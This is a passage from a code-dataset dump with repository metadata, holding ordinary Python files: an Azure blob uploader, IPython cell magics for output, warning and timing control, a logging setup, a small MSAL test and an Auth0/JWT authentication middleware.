value = [dict(timestamp = y[0]
, value = y[1])
for y in factor['values']])
for factor in ret['value']
]
else:
log.info("Fail to call %s ", json.dumps(para))
else:
log.info("Series is empty")
return multi_series_data
def upload_data(config, data_dir, model_key, time_key):
zip_file_base = os.path.join(config.model_temp_dir, 'data')
zip_file = zip_file_base + '.zip'
if os.path.exists(zip_file):
os.remove(zip_file)
shutil.make_archive(zip_file_base, 'zip', data_dir)
azure_blob = AzureBlob(config.az_tsana_model_blob_connection)
container_name = config.tsana_app_name
blob_name = model_key + '_' + time_key
try:
azure_blob.create_container(container_name)
except:
print("Unexpected error:", sys.exc_info()[0])
with open(zip_file, "rb") as data:
azure_blob.upload_blob(container_name, blob_name, data)
os.remove(zip_file)
data_blob_info = {}
data_blob_info['az_blob_connection'] = config.az_tsana_model_blob_connection
data_blob_info['container_name'] = container_name
data_blob_info['blob_name'] = blob_name
return data_blob_info | 42.263441 | 159 | 0.618369 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,706 | 0.344231 |
d38426706b82675c8a7c667f7422351da30f26ac | 435 | py | Python | src/thespian/sourcetree/__init__.py | mtttech/yari-dnd | bcb9d5dbbd38b09e3ac25f7a9d5d88b66b000d1a | [
"MIT"
] | 1 | 2022-03-28T16:10:15.000Z | 2022-03-28T16:10:15.000Z | src/thespian/sourcetree/__init__.py | mtttech/dndpersonae | c4fa129d1e940c9f9a5e29d703e3988b45d90356 | [
"MIT"
] | null | null | null | src/thespian/sourcetree/__init__.py | mtttech/dndpersonae | c4fa129d1e940c9f9a5e29d703e3988b45d90356 | [
"MIT"
] | null | null | null | from .dnd5e import dnd5e_sources
class SourceTree:
backgrounds: object = dnd5e_sources["backgrounds"]
classes: object = dnd5e_sources["classes"]
feats: object = dnd5e_sources["feats"]
metrics: object = dnd5e_sources["metrics"]
races: object = dnd5e_sources["races"]
skills: object = dnd5e_sources["skills"]
subclasses: object = dnd5e_sources["subclasses"]
subraces: object = dnd5e_sources["subraces"]
| 33.461538 | 54 | 0.71954 | 399 | 0.917241 | 0 | 0 | 0 | 0 | 0 | 0 | 75 | 0.172414 |
d3844d5e720aff870756038cd3b7757937565096 | 1,087 | py | Python | controllerconfig/controllerconfig/controllerconfig/common/log.py | etaivan/stx-config | 281e1f110973f96e077645fb01f67b646fc253cc | [
"Apache-2.0"
] | null | null | null | controllerconfig/controllerconfig/controllerconfig/common/log.py | etaivan/stx-config | 281e1f110973f96e077645fb01f67b646fc253cc | [
"Apache-2.0"
] | null | null | null | controllerconfig/controllerconfig/controllerconfig/common/log.py | etaivan/stx-config | 281e1f110973f96e077645fb01f67b646fc253cc | [
"Apache-2.0"
] | 1 | 2021-01-05T16:24:58.000Z | 2021-01-05T16:24:58.000Z | #
# Copyright (c) 2014 Wind River Systems, Inc.
#
# SPDX-License-Identifier: Apache-2.0
#
"""
Logging
"""
import logging
import logging.handlers
_loggers = {}
def get_logger(name):
""" Get a logger or create one """
if name not in _loggers:
_loggers[name] = logging.getLogger(name)
return _loggers[name]
def setup_logger(logger):
""" Setup a logger """
# Send logs to /var/log/platform.log
syslog_facility = logging.handlers.SysLogHandler.LOG_LOCAL1
formatter = logging.Formatter("configassistant[%(process)d] " +
"%(pathname)s:%(lineno)s " +
"%(levelname)8s [%(name)s] %(message)s")
handler = logging.handlers.SysLogHandler(address='/dev/log',
facility=syslog_facility)
handler.setLevel(logging.INFO)
handler.setFormatter(formatter)
logger.addHandler(handler)
logger.setLevel(logging.INFO)
def configure():
""" Setup logging """
for logger in _loggers:
setup_logger(_loggers[logger])
| 21.74 | 74 | 0.608096 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 320 | 0.294388 |
d386b37d9a3c4a1c62ccd7ab2fded76f0930d665 | 357 | py | Python | rastervision/command/train_command.py | AirbusAerial/raster-vision | cfa7826169392e497fb57a540eb952fc6cee3a98 | [
"Apache-2.0"
] | 2 | 2019-04-17T13:04:23.000Z | 2020-10-04T10:28:27.000Z | rastervision/command/train_command.py | Yochengliu/raster-vision | f5badc387df86ce02d84e0e274a08026dbf65bd6 | [
"Apache-2.0"
] | null | null | null | rastervision/command/train_command.py | Yochengliu/raster-vision | f5badc387df86ce02d84e0e274a08026dbf65bd6 | [
"Apache-2.0"
] | null | null | null | import click
from rastervision.command import Command
class TrainCommand(Command):
def __init__(self, task):
self.task = task
def run(self, tmp_dir=None):
if not tmp_dir:
tmp_dir = self.get_tmp_dir()
msg = 'Training model...'
click.echo(click.style(msg, fg='green'))
self.task.train(tmp_dir)
| 21 | 48 | 0.621849 | 299 | 0.837535 | 0 | 0 | 0 | 0 | 0 | 0 | 26 | 0.072829 |
d387b0b7199eff1982faf21fdb262d2cc1e7704b | 10,220 | py | Python | htools/magics.py | hdmamin/htools | 620c6add29561b77c10d793e4be7beeb28b32bab | [
"MIT"
] | 1 | 2019-12-14T15:24:38.000Z | 2019-12-14T15:24:38.000Z | htools/magics.py | hdmamin/htools | 620c6add29561b77c10d793e4be7beeb28b32bab | [
"MIT"
] | null | null | null | htools/magics.py | hdmamin/htools | 620c6add29561b77c10d793e4be7beeb28b32bab | [
"MIT"
] | 1 | 2020-03-30T17:26:39.000Z | 2020-03-30T17:26:39.000Z | import inspect
from IPython.core.interactiveshell import InteractiveShell
from IPython.core.magic import cell_magic, magics_class, Magics
from IPython.core.magic_arguments import (argument, magic_arguments,
parse_argstring)
import warnings
from htools.meta import timebox
@magics_class
class InteractiveMagic(Magics):
@cell_magic
@magic_arguments()
@argument('-p', action='store_true',
help='Boolean flag. If passed, the change will apply for the '
'rest of the notebook, or until the user changes it again. '
'The default behavior is to apply the change only to the '
'current cell.')
def talk(self, line=None, cell=None):
"""When Jupyter notebook is in default mode where
ast_node_interactivity=last (i.e. only the last unprinted statement is
displayed), this will run the current cell while printing all
statements. It then resets the mode so future cells only print the last
statement again.
Examples
---------
In the example below, each cell contains two statements. Notice that
the cell containing the magic displays both lines of output, while the
other cells only display the last output.
>>> 5 + 10
>>> 6 + 11
17
%%talk
>>> 6 + 2
>>> 3 + 1
8
4
>>> 1 + 2
>>> 3 + 4
7
"""
self._adjust_verbosity(cell, 'all', parse_argstring(self.talk, line))
@cell_magic
@magic_arguments()
@argument('-p', action='store_true',
help='Boolean flag. If passed, the change will apply for the '
'rest of the notebook, or until the user changes it again. '
'The default behavior is to apply the change only to the '
'current cell.')
def hush(self, line=None, cell=None):
"""The reverse of the `talk` magic. When the notebook is in
ast_node_interactivty='all' mode, this can be used to suppress outputs
other than the last one for a single cell. Cells that follow will
return to the display mode set for the whole notebook.
Examples
---------
In the example below, each cell contains two statements. Notice that
the cell containing the magic only displays the last line of output,
while the other cells display both outputs.
>>> 5 + 10
>>> 6 + 11
15
17
%%hush
>>> 6 + 2
>>> 3 + 1
4
>>> 1 + 2
>>> 3 + 4
3
7
"""
self._adjust_verbosity(cell, 'last', parse_argstring(self.hush, line))
@cell_magic
@magic_arguments()
@argument('-p', action='store_true',
help='Boolean flag. If passed, the change will apply for the '
'rest of the notebook, or until the user changes it again. '
'The default behavior is to apply the change only to the '
'current cell.')
def mute(self, line=None, cell=None):
"""A more extreme version of the `hush` magic that suppresses all
output from a cell. Cells that follow will return to the default mode
of ast_node_interactivity='last' unless the -p flag (for persist) is
provided.
Examples
---------
In the example below, each cell contains two statements. Notice that
the cell containing the magic displays no output, while the other cells
display the final output.
>>> 5 + 10
>>> 6 + 11
17
%%mute
>>> 6 + 2
>>> 3 + 1
>>> 1 + 2
>>> 3 + 4
7
"""
self._adjust_verbosity(cell, 'none', parse_argstring(self.mute, line))
def _adjust_verbosity(self, cell, mode, args):
old_setting = InteractiveShell.ast_node_interactivity
InteractiveShell.ast_node_interactivity = mode
self.shell.run_cell(cell)
if not args.p:
InteractiveShell.ast_node_interactivity = old_setting
@magics_class
class WarningMagic(Magics):
@cell_magic
@magic_arguments()
@argument('-p', action='store_true', help='Boolean flag. If passed, the '
'change will apply for the rest of the notebook, or until the '
'user changes it again. The default behavior is to apply the '
'change only to the current cell.')
def lax(self, line, cell):
"""Silence warnings for a cell. The -p flag can be used to make the
change persist, at least until the user changes it again.
"""
args = parse_argstring(self.lax, line)
self._warn(cell, 'ignore', args.p)
@cell_magic
@magic_arguments()
@argument('-p', action='store_true', help='Boolean flag. If passed, the '
'change will apply for the rest of the notebook, or until the '
'user changes it again. The default behavior is to apply the '
'change only to the current cell.')
def nag(self, line, cell):
"""Silence warnings for a cell. The -p flag can be used to make the
change persist, at least until the user changes it again.
"""
args = parse_argstring(self.nag, line)
self._warn(cell, 'always', args.p)
def _warn(self, cell, mode, persist):
"""Base method for lax and nag. These could easily be handled in a
single method with optional flags, but I find the usage to be more
intuitive when the names are different, and generally prefer flag-free
magics since the goal is ease of use.
The persist flag is processed in the child methods because parsing
references the method that was called.
"""
warnings.filterwarnings(mode)
self.shell.run_cell(cell)
# Reset manually because warnings.resetwarnings() behaved erratically.
if not persist:
out_modes = {'ignore', 'always'}
out_modes.remove(mode)
warnings.filterwarnings(list(out_modes)[0])
@magics_class
class FunctionRacerMagic(Magics):
@cell_magic
@magic_arguments()
@argument('-n', help='Number of loops when timing functions (inner loop).')
@argument('-r', help='Number of runs when timing functions (outer loop).')
def race(self, line, cell):
"""Time 2 or more functions to allow the user to easily compare speeds.
Each line will be timed separately, so a function call cannot take up
multiple lines. This is essentially a convenient wrapper for the
%%timeit magic that ensures all functions are timed with the same
choice of parameters. (When timing each function separately, I found
that during the testing process I would often end up changing some
function or timeit parameters in one case but forget to change it for
another. This magic aims to prevent that situation.)
Examples
---------
Example 1: A fairly standard case where we time three possible
implementations of a function to see which is fastest.
%%race -n 10 -r 3
>>> tokenizer_v1(text)
>>> tokenizer_v2(text)
>>> tokenizer_v3(text)
Example 2: If a function requires many arguments or if parameter
names are long, consider passing in a list or dictionary of arguments.
%%race
>>> many_args_func_v1(**params)
>>> many_args_func_v2(**params)
"""
args = parse_argstring(self.race, line)
n = args.n or 5
r = args.r or 3
# Split cell into lines of code to execute.
rows = [row for row in cell.strip().split('\n')
if not row.startswith('#')]
prefix = f'%timeit -n {n} -r {r} '
for row in rows:
self.shell.run_cell(prefix + row)
@magics_class
class TimeboxMagic(Magics):
"""Timebox a cell's execution to a user-specified duration. As with any
standard try/except block, note that values can change during execution
even if an error is eventually thrown (i.e. no rollback occurs).
Sample usage:
%%timebox 3
# Throw error if cell takes longer than 3 seconds to execute.
output = slow_function(*args)
%%timebox 3 -p
# Attempt to execute cell for 3 seconds, then give up. Message is printed
# stating that time is exceeded but no error is thrown.
output = slow_function(*args)
"""
@cell_magic
@magic_arguments()
@argument('time', type=int,
help='Max number of seconds before throwing error.')
@argument('-p', action='store_true',
help='Boolean flag: if provided, use permissive '
'execution (if the cell exceeds the specified '
'time, no error will be thrown, meaning '
'following cells can still execute.) If '
'flag is not provided, default behavior is to '
'raise a TimeExceededError and halt notebook '
'execution.')
def timebox(self, line=None, cell=None):
args = parse_argstring(self.timebox, line)
if args.p: cell = self._make_cell_permissive(cell)
with timebox(args.time) as tb:
self.shell.run_cell(cell)
@staticmethod
def _make_cell_permissive(cell):
"""Place whole cell in try/except block. Built-in error handling in
timebox context manager doesn't work because ipython shell has
its own logic for error handling, so we need to do this messy string
manipulation.
"""
robust_cell = (
'try:\n\t' + cell.replace('\n', '\n\t')
+ '\nexcept:\n\tprint("Time exceeded. '
'\\nWarning: objects may have changed during execution.")'
)
return robust_cell
# Automatically register all magics defined in this module.
magics = (obj for obj in map(locals().get, dir())
if inspect.isclass(obj)
and obj.__name__ != 'Magics'
and issubclass(obj, Magics))
get_ipython().register_magics(*magics)
| 35.486111 | 79 | 0.609002 | 9,573 | 0.936693 | 0 | 0 | 9,629 | 0.942172 | 0 | 0 | 6,573 | 0.643151 |
d3891e3d0186411e4c72b16b384e7e13ef7cce0a | 395 | py | Python | tests/test_msal.py | narongdejsrn/django-rest-framework-msal | 0e969aadf7a681b24b630c008f05be1d339d0df4 | [
"MIT"
] | 3 | 2020-04-22T01:56:41.000Z | 2021-06-22T15:21:57.000Z | tests/test_msal.py | narongdejsrn/django-rest-framework-msal | 0e969aadf7a681b24b630c008f05be1d339d0df4 | [
"MIT"
] | 2 | 2021-01-08T09:04:16.000Z | 2021-07-20T19:43:15.000Z | tests/test_msal.py | narongdejsrn/django-rest-framework-msal | 0e969aadf7a681b24b630c008f05be1d339d0df4 | [
"MIT"
] | 4 | 2020-05-25T07:34:37.000Z | 2021-06-11T07:37:59.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
test-msal
------------
Tests for MSAL Connection
"""
from django.test import TestCase
from drf_msal_jwt.utils import build_auth_url
class TestMSAL(TestCase):
def setUp(self):
pass
def test_login_url(self):
login_url = build_auth_url()
self.assertIsNotNone(login_url)
def tearDown(self):
pass
| 14.62963 | 45 | 0.637975 | 206 | 0.521519 | 0 | 0 | 0 | 0 | 0 | 0 | 101 | 0.255696 |
d3898090b566ac68c831a2bc03a18937bcdbab69 | 25,135 | py | Python | server/athenian/api/auth.py | athenianco/athenian-api | dd5556101a8c49703d6b0516e4268b9e8d8eda5b | [
"RSA-MD"
] | 9 | 2020-10-11T22:12:03.000Z | 2022-02-26T02:16:45.000Z | server/athenian/api/auth.py | athenianco/athenian-api | dd5556101a8c49703d6b0516e4268b9e8d8eda5b | [
"RSA-MD"
] | 246 | 2019-12-05T06:37:30.000Z | 2022-03-29T10:00:07.000Z | server/athenian/api/auth.py | athenianco/athenian-api | dd5556101a8c49703d6b0516e4268b9e8d8eda5b | [
"RSA-MD"
] | 5 | 2019-12-04T22:38:05.000Z | 2021-02-26T00:50:04.000Z | import asyncio
from datetime import datetime, timedelta
import functools
from http import HTTPStatus
import logging
import os
import pickle
from random import random
import re
import struct
from typing import Any, Callable, Coroutine, Dict, List, Optional, Sequence, Tuple
import warnings
import aiohttp.web
from aiohttp.web_runner import GracefulExit
import aiomcache
from connexion.exceptions import AuthenticationProblem, OAuthProblem, Unauthorized
from connexion.lifecycle import ConnexionRequest
import connexion.security
from connexion.utils import deep_get
with warnings.catch_warnings():
# this will suppress all warnings in this block
warnings.filterwarnings("ignore", message="int_from_bytes is deprecated")
from jose import jwt
from multidict import CIMultiDict
import sentry_sdk
from sqlalchemy import select
from athenian.api.async_utils import gather
from athenian.api.cache import cached
from athenian.api.controllers.account import get_user_account_status
from athenian.api.kms import AthenianKMS
from athenian.api.models.state.models import Account, God, UserToken
from athenian.api.models.web import ForbiddenError, GenericError
from athenian.api.models.web.user import User
from athenian.api.request import AthenianWebRequest
from athenian.api.response import ResponseError
from athenian.api.tracing import sentry_span
from athenian.api.typing_utils import wraps
class Auth0:
"""Class for Auth0 middleware compatible with aiohttp."""
AUTH0_DOMAIN = os.getenv("AUTH0_DOMAIN")
AUTH0_AUDIENCE = os.getenv("AUTH0_AUDIENCE")
AUTH0_CLIENT_ID = os.getenv("AUTH0_CLIENT_ID")
AUTH0_CLIENT_SECRET = os.getenv("AUTH0_CLIENT_SECRET")
DEFAULT_USER = os.getenv("ATHENIAN_DEFAULT_USER")
KEY = os.getenv("ATHENIAN_INVITATION_KEY")
USERINFO_CACHE_TTL = 60 # seconds
log = logging.getLogger("auth")
def __init__(self,
domain=AUTH0_DOMAIN,
audience=AUTH0_AUDIENCE,
client_id=AUTH0_CLIENT_ID,
client_secret=AUTH0_CLIENT_SECRET, whitelist: Sequence[str] = tuple(),
default_user=DEFAULT_USER,
key=KEY,
cache: Optional[aiomcache.Client] = None,
lazy=False,
force_user: str = ""):
"""
Create a new Auth0 middleware.
See:
- https://auth0.com/docs/tokens/guides/get-access-tokens#control-access-token-audience
- https://auth0.com/docs/api-auth/tutorials/client-credentials
:param domain: Auth0 domain.
:param audience: JWT audience parameter.
:param client_id: Application's Client ID.
:param client_secret: Application's Client Secret.
:param whitelist: Routes that do not need authorization.
:param default_user: Default user ID - the one that's assigned to public, unauthorized \
requests.
:param key: Global secret used to encrypt sensitive personal information.
:param cache: memcached client to cache the user profiles.
:param lazy: Value that indicates whether Auth0 Management API tokens and JWKS data \
must be asynchronously requested at first related method call.
:param force_user: Ignore all the incoming bearer tokens and make all requests on behalf \
of this user ID.
"""
for var, env_name in ((domain, "AUTH0_DOMAIN"),
(audience, "AUTH0_AUDIENCE"),
(client_id, "AUTH0_CLIENT_ID"),
(client_secret, "AUTH0_CLIENT_SECRET"),
(default_user, "ATHENIAN_DEFAULT_USER"),
(key, "ATHENIAN_INVITATION_KEY")):
if not var:
raise EnvironmentError("%s environment variable must be set." % env_name)
self._domain = domain
self._audience = audience
self._whitelist = whitelist
self._cache = cache
self._client_id = client_id
self._client_secret = client_secret
self._default_user_id = default_user
self._default_user = None # type: Optional[User]
self._key = key
self.force_user = force_user
if force_user:
self.log.warning("Forced user authorization mode: %s", force_user)
self._session = aiohttp.ClientSession()
self._kids_event = asyncio.Event()
if not lazy:
self._jwks_loop = asyncio.ensure_future(self._fetch_jwks_loop())
else:
self._jwks_loop = None # type: Optional[asyncio.Future]
self._kids: Dict[str, Any] = {}
self._mgmt_event = asyncio.Event()
self._mgmt_token = None # type: Optional[str]
if not lazy:
self._mgmt_loop = asyncio.ensure_future(self._acquire_management_token_loop())
else:
self._mgmt_loop = None # type: Optional[asyncio.Future]
async def kids(self) -> Dict[str, Any]:
"""Return the mapping kid -> Auth0 jwks record with that kid; wait until fetched."""
if self._jwks_loop is None:
self._jwks_loop = asyncio.ensure_future(self._fetch_jwks_loop())
await self._kids_event.wait()
return self._kids
async def mgmt_token(self) -> str:
"""Return the Auth0 management API token; wait until fetched."""
if self._mgmt_loop is None:
self._mgmt_loop = asyncio.ensure_future(self._acquire_management_token_loop())
await self._mgmt_event.wait()
if not self._mgmt_token:
raise LookupError("Could not acquire the Auth0 Management token.")
return self._mgmt_token
async def default_user(self) -> User:
"""Return the user of unauthorized, public requests."""
if self._default_user is not None:
return self._default_user
self._default_user = await self.get_user(self._default_user_id)
if self._default_user is None:
message = "Failed to fetch the default user (%s) details. " \
"Try changing ATHENIAN_DEFAULT_USER" % self._default_user_id
self.log.error(message)
raise GracefulExit(message)
return self._default_user
@property
def domain(self) -> str:
"""Return the assigned Auth0 domain, e.g. "athenian.auth0.com"."""
return self._domain
@property
def audience(self) -> str:
"""Return the assigned Auth0 audience URL, e.g. "https://api.athenian.co"."""
return self._audience
@property
def key(self) -> str:
"""Return the global secret used to encrypt sensitive personal information."""
return self._key
async def close(self):
"""Free resources and close connections associated with the object."""
if self._jwks_loop is not None:
self._jwks_loop.cancel()
if self._mgmt_loop is not None: # this may happen if lazy_mgmt=True
self._mgmt_loop.cancel()
session = self._session
# FIXME(vmarkovtsev): remove this bloody mess when this issue is resolved:
# https://github.com/aio-libs/aiohttp/issues/1925#issuecomment-575754386
transports = 0
all_is_lost = asyncio.Event()
if session.connector is not None:
for conn in session.connector._conns.values():
for handler, _ in conn:
proto = getattr(handler.transport, "_ssl_protocol", None)
if proto is None:
continue
transports += 1
def connection_lost(orig_lost, exc):
orig_lost(exc)
nonlocal transports
transports -= 1
if transports == 0:
all_is_lost.set()
def eof_received(orig_eof_received):
try:
orig_eof_received()
except AttributeError:
# It may happen that eof_received() is called after
# _app_protocol and _transport are set to None.
# Jeez, asyncio sucks sometimes.
pass
proto.connection_lost = functools.partial(
connection_lost, proto.connection_lost)
proto.eof_received = functools.partial(eof_received, proto.eof_received)
await session.close()
if transports > 0:
await all_is_lost.wait()
async def get_user(self, user: str) -> Optional[User]:
"""Retrieve a user using Auth0 mgmt API by ID."""
users = await self.get_users([user])
if len(users) == 0:
return None
return next(iter(users.values()))
@sentry_span
async def get_users(self, users: Sequence[str]) -> Dict[str, User]:
"""
Retrieve several users using Auth0 mgmt API by ID.
:return: Mapping from user ID to the found user details. Some users may be not found, \
some users may be duplicates.
"""
token = await self.mgmt_token()
assert len(users) >= 0 # we need __len__
async def get_batch(batch: List[str]) -> List[User]:
nonlocal token
query = "user_id:(%s)" % " ".join('"%s"' % u for u in batch)
for retries in range(1, 31):
try:
resp = await self._session.get(
"https://%s/api/v2/users?q=%s" % (self._domain, query),
headers={"Authorization": "Bearer " + token})
except aiohttp.ClientOSError as e:
if e.errno in (-3, 101, 103, 104):
self.log.warning("Auth0 Management API: %s", e)
# -3: Temporary failure in name resolution
# 101: Network is unreachable
await asyncio.sleep(0.1)
continue
raise e from None
except RuntimeError:
# our loop is closed and we are doomed
return []
if resp.status == HTTPStatus.TOO_MANY_REQUESTS:
self.log.warning("Auth0 Management API rate limit hit while listing "
"%d/%d users, retry %d",
len(batch), len(users), retries)
await asyncio.sleep(0.5 + random())
elif resp.status in (HTTPStatus.REQUEST_URI_TOO_LONG, HTTPStatus.BAD_REQUEST):
if len(batch) == 1:
return []
m = len(batch) // 2
self.log.warning("Auth0 Management API /users raised HTTP %d, bisecting "
"%d/%d -> %d, %d",
resp.status, len(batch), len(users), m, len(batch) - m)
b1, b2 = await gather(get_batch(batch[:m]), get_batch(batch[m:]))
return b1 + b2
elif resp.status == HTTPStatus.UNAUTHORIZED:
# force refresh the token
self._mgmt_loop.cancel()
self._mgmt_loop = None
self._mgmt_token = None
token = await self.mgmt_token()
else:
if resp.status >= 400:
try:
response_body = await resp.json()
except aiohttp.ContentTypeError:
response_body = await resp.text()
self.log.error("Auth0 Management API /users raised HTTP %d: %s",
resp.status, response_body)
break
else: # for retries in range
return []
if resp.status != HTTPStatus.OK:
return []
found = await resp.json()
return [User.from_auth0(**u, encryption_key=self.key) for u in found]
return {u.id: u for u in await get_batch(list(users))}
async def _fetch_jwks_loop(self) -> None:
while True:
await self._fetch_jwks()
await asyncio.sleep(3600) # 1 hour
async def _acquire_management_token_loop(self) -> None:
while True:
expires_in = await self._acquire_management_token(1)
await asyncio.sleep(expires_in)
async def _fetch_jwks(self) -> None:
req = await self._session.get("https://%s/.well-known/jwks.json" % self._domain)
jwks = await req.json()
self.log.info("Fetched %d JWKS records", len(jwks))
self._kids = {key["kid"]: {k: key[k] for k in ("kty", "kid", "use", "n", "e")}
for key in jwks["keys"]}
self._kids_event.set()
async def _acquire_management_token(self, attempt: int) -> float:
max_attempts = 10
error = None
try:
resp = await self._session.post("https://%s/oauth/token" % self._domain, headers={
"content-type": "application/x-www-form-urlencoded",
}, data={
"grant_type": "client_credentials",
"client_id": self._client_id,
"client_secret": self._client_secret,
"audience": "https://%s/api/v2/" % self._domain,
}, timeout=5)
data = await resp.json()
self._mgmt_token = data["access_token"]
self._mgmt_event.set()
expires_in = int(data["expires_in"])
except Exception as e:
error = e
try:
resp_text = await resp.text()
except Exception:
resp_text = "N/A"
# do not use %s - Sentry does not display it properly
if attempt >= max_attempts:
self.log.exception("Failed to renew the Auth0 management token: " + resp_text)
raise GracefulExit() from e
if error is not None:
self.log.warning("Failed to renew the Auth0 management token %d / %d: %s: %s",
attempt, max_attempts, error, resp_text)
await asyncio.sleep(1)
return await self._acquire_management_token(attempt + 1)
self.log.info("Acquired new Auth0 management token %s...%s for the next %s",
self._mgmt_token[:12], self._mgmt_token[-12:], timedelta(seconds=expires_in))
expires_in -= 5 * 60 # 5 minutes earlier
if expires_in < 0:
expires_in = 0
return expires_in
def _is_whitelisted(self, request: aiohttp.web.Request) -> bool:
for pattern in self._whitelist:
if re.match(pattern, request.path):
return True
return False
async def _get_user_info(self, token: str) -> User:
if token == "null":
return await self.default_user()
return await self._get_user_info_cached(token)
@cached(
exptime=lambda self, **_: self.USERINFO_CACHE_TTL,
serialize=pickle.dumps,
deserialize=pickle.loads,
key=lambda token, **_: (token,),
cache=lambda self, **_: self._cache,
)
async def _get_user_info_cached(self, token: str) -> User:
resp = await self._session.get("https://%s/userinfo" % self._domain,
headers={"Authorization": "Bearer " + token})
try:
user = await resp.json()
except aiohttp.ContentTypeError:
raise ResponseError(GenericError(
"/errors/Auth0", title=resp.reason, status=resp.status,
detail=await resp.text()))
if resp.status != 200:
raise ResponseError(GenericError(
"/errors/Auth0", title=resp.reason, status=resp.status,
detail=user.get("description", str(user))))
return User.from_auth0(**user, encryption_key=self.key)
async def _set_user(self, request: AthenianWebRequest, token: str, method: str) -> None:
if method == "bearer":
token_info = await self._extract_bearer_token(token)
request.uid, request.account = token_info["sub"], None
elif method == "apikey":
request.uid, request.account = await self._extract_api_key(token, request)
else:
raise AssertionError("Unsupported auth method: %s" % method)
god = await request.sdb.fetch_one(
select([God.mapped_id]).where(God.user_id == request.uid))
if god is not None:
request.god_id = request.uid
if "X-Identity" in request.headers:
mapped_id = request.headers["X-Identity"]
else:
mapped_id = god[God.mapped_id.name]
if mapped_id is not None:
request.uid = mapped_id
self.log.info("God mode: %s became %s", request.god_id, mapped_id)
request.is_default_user = request.uid == self._default_user_id
sentry_sdk.set_user({"id": request.uid})
async def get_user_info():
if method != "bearer" or (god is not None and request.god_id is not None):
user_info = await self.get_user(key := request.uid)
else:
user_info = await self._get_user_info(key := token)
if user_info is None:
raise ResponseError(GenericError(
"/errors/Auth0", title="Failed to retrieve user details from Auth0",
status=HTTPStatus.SERVICE_UNAVAILABLE,
detail=key,
))
sentry_sdk.set_user({"username": user_info.login, "email": user_info.email})
return user_info
request.user = get_user_info
async def _extract_bearer_token(self, token: str) -> Dict[str, Any]:
if token == "null":
return {"sub": self.force_user or self._default_user_id}
# People who understand what's going on here:
# - @dennwc
# - @vmarkovtsev
try:
unverified_header = jwt.get_unverified_header(token)
except jwt.JWTError as e:
raise OAuthProblem(
description="Invalid header: %s. Use an RS256 signed JWT Access Token." % e)
if unverified_header["alg"] != "RS256":
raise OAuthProblem(
description="Invalid algorithm %s. Use an RS256 signed JWT Access Token." %
unverified_header["alg"])
kids = await self.kids()
try:
rsa_key = kids[unverified_header["kid"]]
except KeyError:
raise OAuthProblem(description="Unable to find the matching Auth0 RSA public key")
try:
return jwt.decode(
token,
rsa_key,
algorithms=["RS256"],
audience=self._audience,
issuer="https://%s/" % self._domain,
)
except jwt.ExpiredSignatureError as e:
raise OAuthProblem(description="JWT expired: %s" % e)
except jwt.JWTClaimsError as e:
raise OAuthProblem(description="invalid claims: %s" % e)
except jwt.JWTError as e:
raise OAuthProblem(description="Unable to parse the authentication token: %s" % e)
async def _extract_api_key(self, token: str, request: AthenianWebRequest) -> Tuple[str, int]:
kms = request.app["kms"] # type: AthenianKMS
if kms is None:
raise AuthenticationProblem(
status=HTTPStatus.UNAUTHORIZED,
title="Unable to authenticate with an API key.",
detail="The backend was not properly configured and there is no connection with "
"Google Key Management Service to decrypt API keys.")
try:
plaintext = await kms.decrypt(token)
except aiohttp.ClientResponseError:
raise Unauthorized()
try:
token_id = struct.unpack("<q", plaintext)[0]
except (ValueError, struct.error):
raise Unauthorized() from None
token_obj = await request.sdb.fetch_one(
select([UserToken]).where(UserToken.id == token_id))
if token_obj is None:
raise Unauthorized()
uid = token_obj[UserToken.user_id.name]
account = token_obj[UserToken.account_id.name]
return uid, account
class AthenianAioHttpSecurityHandlerFactory(connexion.security.AioHttpSecurityHandlerFactory):
"""Override verify_security() to re-route the security affairs to our Auth0 class."""
def __init__(self, auth: Auth0, pass_context_arg_name):
"""`auth` is supplied by AthenianAioHttpApi."""
super().__init__(pass_context_arg_name=pass_context_arg_name)
self.auth = auth
def verify_security(self, auth_funcs, required_scopes, function,
) -> Callable[[ConnexionRequest], Coroutine[None, None, Any]]:
"""
Decorate the request pipeline to check the security, either JWT or APIKey.
If we don't see any authorization details, we assume the "default" user.
"""
auth = self.auth # type: Auth0
async def get_token_info(request: ConnexionRequest):
token_info = self.no_value
for func in auth_funcs:
token_info = func(request, required_scopes)
while asyncio.iscoroutine(token_info):
token_info = await token_info
if token_info is not self.no_value:
break
return token_info
@functools.wraps(function)
async def wrapper(request: ConnexionRequest):
token_info = self.no_value if auth.force_user else await get_token_info(request)
if token_info is self.no_value:
# "null" is the "magic" JWT that loads the default or forced user
request.headers = CIMultiDict(request.headers)
request.headers["Authorization"] = "Bearer null"
token_info = await get_token_info(request)
if token_info is self.no_value:
raise Unauthorized("The endpoint you are calling requires X-API-Key header.")
# token_info = {"token": <token>, "method": "bearer" or "apikey"}
await auth._set_user(context := request.context, **token_info)
# check whether the user may access the specified account
if isinstance(request.json, dict):
if (account := request.json.get("account")) is not None:
assert isinstance(account, int)
with sentry_sdk.configure_scope() as scope:
scope.set_tag("account", account)
await get_user_account_status(
context.uid, account, context.sdb, context.cache)
elif (account := getattr(context, "account", None)) is not None:
canonical = context.match_info.route.resource.canonical
route_specs = context.app["route_spec"]
if (spec := route_specs.get(canonical, None)) is not None:
try:
required = "account" in deep_get(spec, [
"requestBody", "content", "application/json", "schema",
"required",
])
except KeyError:
required = False
if required:
request.json["account"] = account
context.account = account
# check whether the account is enabled
if context.account is not None:
expires_at = await context.sdb.fetch_val(
select([Account.expires_at]).where(Account.id == context.account))
if not getattr(context, "god_id", False) and (
expires_at is None or expires_at < datetime.now(expires_at.tzinfo)):
auth.log.warning("Attempt to use an expired account %d by user %s",
context.account, context.uid)
raise Unauthorized("Your account has expired.")
# finish the auth processing and chain forward
return await function(request)
return wrapper
def disable_default_user(func):
"""Decorate an endpoint handler to raise 403 if the user is the default one."""
async def wrapped_disable_default_user(request: AthenianWebRequest,
*args, **kwargs) -> aiohttp.web.Response:
if request.is_default_user:
raise ResponseError(ForbiddenError("%s is the default user" % request.uid))
return await func(request, *args, **kwargs)
wraps(wrapped_disable_default_user, func)
return wrapped_disable_default_user
| 45.288288 | 99 | 0.580227 | 23,195 | 0.922817 | 0 | 0 | 7,548 | 0.300298 | 18,075 | 0.719117 | 5,735 | 0.228168 |
d38adc66f7d2d09f63a105229844d890c12fe69b | 732 | py | Python | expon/utils/git.py | hi-zhenyu/expon | 17ad421cd4c4085d3cad090b7c3383e4957075c4 | [
"MIT"
